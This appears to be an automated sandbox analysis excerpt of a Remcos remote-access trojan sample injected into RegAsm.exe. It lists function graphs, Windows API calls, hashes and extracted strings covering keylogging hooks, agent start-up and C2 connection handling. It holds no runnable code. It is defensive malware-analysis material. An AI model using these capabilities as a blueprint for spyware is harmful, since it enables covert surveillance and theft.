                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                        • API String ID: 4236061018-3687161714
                                                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1288 40a2b8-40a2cf 1289 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1288->1289 1290 40a333-40a343 GetMessageA 1288->1290 1289->1290 1293 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1289->1293 1291 40a345-40a35d TranslateMessage DispatchMessageA 1290->1291 1292 40a35f 1290->1292 1291->1290 1291->1292 1294 40a361-40a366 1292->1294 1293->1294
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • GetMessageA.USER32 ref: 0040A33B
                                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                                        • DispatchMessageA.USER32 ref: 0040A355
                                                        Strings
                                                        • Keylogger initialization failure: error , xrefs: 0040A301
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                        • String ID: Keylogger initialization failure: error
                                                        • API String ID: 3219506041-952744263
                                                        • Opcode ID: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                        • Opcode Fuzzy Hash: 24ad775559425fbf79376f518a65b03612fe455b391ecaf03d99fa65814271bc
                                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                          • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                                          • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                        • ExitProcess.KERNEL32 ref: 0040F8CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                        • String ID: 4.9.4 Pro$override$pth_unenc
                                                        • API String ID: 2281282204-930821335
                                                        • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                        • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,007AA308), ref: 00433849
                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                        • String ID:
                                                        • API String ID: 1815803762-0
                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                        Strings
                                                        • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSystem
                                                        • String ID: GetSystemTimePreciseAsFileTime
                                                        • API String ID: 2086374402-595813830
                                                        • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                        • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                        • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                        • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                        • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                        • Instruction Fuzzy Hash:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->183 184 40ee0f-40ee19 call 409057 180->184 193 40ee1e-40ee42 call 40247c call 434798 183->193 184->193 211 40ee51 193->211 212 40ee44-40ee4f call 436e90 193->212 203->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 356 40f159-40f16c call 401e65 call 401fab 346->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->357 367 40f1cc-40f1df call 401e65 call 401fab 356->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 409 40f279-40f280 404->409 410 40f26d-40f277 CreateThread 404->410 405->404 413 40f282-40f285 409->413 414 40f28e 409->414 410->409 415 40f287-40f28c 413->415 416 40f2cc-40f2df call 401fab call 4134ff 413->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 414->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                                        APIs
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                          • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                          • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                          • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                                          • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                        • API String ID: 2830904901-1084268468
                                                        • Opcode ID: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
                                                        • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                                        • Opcode Fuzzy Hash: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
                                                        • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 582 415aa3-415ab5 call 404e26 call 4021fa 561->582 566->582 583 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->583 567->582 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 582->597 598 415add-415ae5 call 401e8d 582->598 648 415380-41538d call 405aa6 583->648 649 415392-4153b9 call 401fab call 4135a6 583->649 597->598 598->477 648->649 655 4153c0-41577f call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->655 656 4153bb-4153bd 649->656 782 415781 call 404aa1 655->782 656->655 783 415786-415a0a call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a0f-415a16 783->901 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->582
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$ErrorLastLocalTime
                                                        • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                        • API String ID: 524882891-4102665942
                                                        • Opcode ID: ab28f9adf8b547a1f2ffb6b62a3bc060c3e60cb7c1f814ea2404530d0922b45b
                                                        • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                                        • Opcode Fuzzy Hash: ab28f9adf8b547a1f2ffb6b62a3bc060c3e60cb7c1f814ea2404530d0922b45b
                                                        • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 925 414d86-414dc2 926 414dc8-414ddd GetSystemDirectoryA 925->926 927 414edd-414ee8 925->927 928 414ed3 926->928 929 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 926->929 928->927 934 414e31-414e3b GetProcAddress 929->934 935 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 929->935 936 414e42-414e44 934->936 937 414e3d-414e40 FreeLibrary 934->937 948 414e82-414e8c GetProcAddress 935->948 949 414ecf-414ed2 935->949 936->935 939 414e97 936->939 937->936 941 414e99-414eaa GetProcAddress 939->941 943 414eb4-414eb7 FreeLibrary 941->943 944 414eac-414eb0 941->944 947 414eb9-414ebb 943->947 944->941 946 414eb2 944->946 946->947 947->949 950 414ebd-414ecd 947->950 951 414e93-414e95 948->951 952 414e8e-414e91 FreeLibrary 948->952 949->928 950->949 950->950 951->939 951->949 952->951
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                        • API String ID: 2490988753-744132762
                                                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • Sleep.KERNEL32(00001388), ref: 0040A740
                                                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                        • API String ID: 3795512280-1152054767
